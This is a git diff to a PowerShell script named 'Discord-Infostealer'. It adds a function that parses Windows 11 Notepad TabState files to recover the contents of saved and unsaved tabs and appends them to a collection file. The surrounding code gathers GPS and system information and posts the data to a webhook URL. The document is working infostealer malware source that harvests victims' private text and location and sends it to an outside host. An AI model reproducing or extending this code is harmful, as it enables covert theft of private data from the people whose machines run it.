diff --git a/Discord-Infostealer/main.ps1 b/Discord-Infostealer/main.ps1 index 1cd470f..d0d9363 100644 --- a/Discord-Infostealer/main.ps1 +++ b/Discord-Infostealer/main.ps1 @@ -169,6 +169,49 @@ else{ $GPS = "LAT = $Lat LONG = $Lon" } +function EnumNotepad{ + $appDataDir = [Environment]::GetFolderPath('LocalApplicationData') + $directoryRelative = "Packages\Microsoft.WindowsNotepad_*\LocalState\TabState" + $matchingDirectories = Get-ChildItem -Path (Join-Path -Path $appDataDir -ChildPath 'Packages') -Filter 'Microsoft.WindowsNotepad_*' -Directory + foreach ($dir in $matchingDirectories) { + $fullPath = Join-Path -Path $dir.FullName -ChildPath 'LocalState\TabState' + $listOfBinFiles = Get-ChildItem -Path $fullPath -Filter *.bin + foreach ($fullFilePath in $listOfBinFiles) { + if ($fullFilePath.Name -like '*.0.bin' -or $fullFilePath.Name -like '*.1.bin') { + continue + } + $seperator = ("=" * 60) + $SMseperator = ("-" * 60) + $seperator | Out-File -FilePath $outpath -Append + $filename = $fullFilePath.Name + $contents = [System.IO.File]::ReadAllBytes($fullFilePath.FullName) + $isSavedFile = $contents[3] + if ($isSavedFile -eq 1) { + $lengthOfFilename = $contents[4] + $filenameEnding = 5 + $lengthOfFilename * 2 + $originalFilename = [System.Text.Encoding]::Unicode.GetString($contents[5..($filenameEnding - 1)]) + "Found saved file : $originalFilename" | Out-File -FilePath $outpath -Append + $filename | Out-File -FilePath $outpath -Append + $SMseperator | Out-File -FilePath $outpath -Append + Get-Content -Path $originalFilename -Raw | Out-File -FilePath $outpath -Append + } else { + "Found an unsaved tab!" | Out-File -FilePath $outpath -Append + $filename | Out-File -FilePath $outpath -Append + $SMseperator | Out-File -FilePath $outpath -Append + $filenameEnding = 0 + $delimeterStart = [array]::IndexOf($contents, 0, $filenameEnding) + $delimeterEnd = [array]::IndexOf($contents, 1, $filenameEnding) + + $fileMarker = $contents[($delimeterStart + 2)..($delimeterEnd - 1)] + $fileMarker = -join ($fileMarker | ForEach-Object { [char]$_ }) + + $originalFileContents = [System.Text.Encoding]::Unicode.GetString($contents[($delimeterEnd + 4 + $fileMarker.Length)..($contents.Length - 6)]) + $originalFileContents | Out-File -FilePath $outpath -Append + } + "`n" | Out-File -FilePath $outpath -Append + } + } +} $infomessage = " ================================================================================================================================== @@ -275,6 +318,13 @@ $infomessage | Out-File -FilePath $outpath -Encoding ASCII -Append $infomessage1 | Out-File -FilePath $outpath -Encoding ASCII -Append $infomessage2 | Out-File -FilePath $outpath -Encoding ASCII -Append +if ($OSString -like '*11*'){ + EnumNotepad +} +else{ + "no notepad tabs (windows 10 or below)" | Out-File -FilePath $outpath -Encoding ASCII -Append +} + $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = "$infomessage1"} | ConvertTo-Json Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys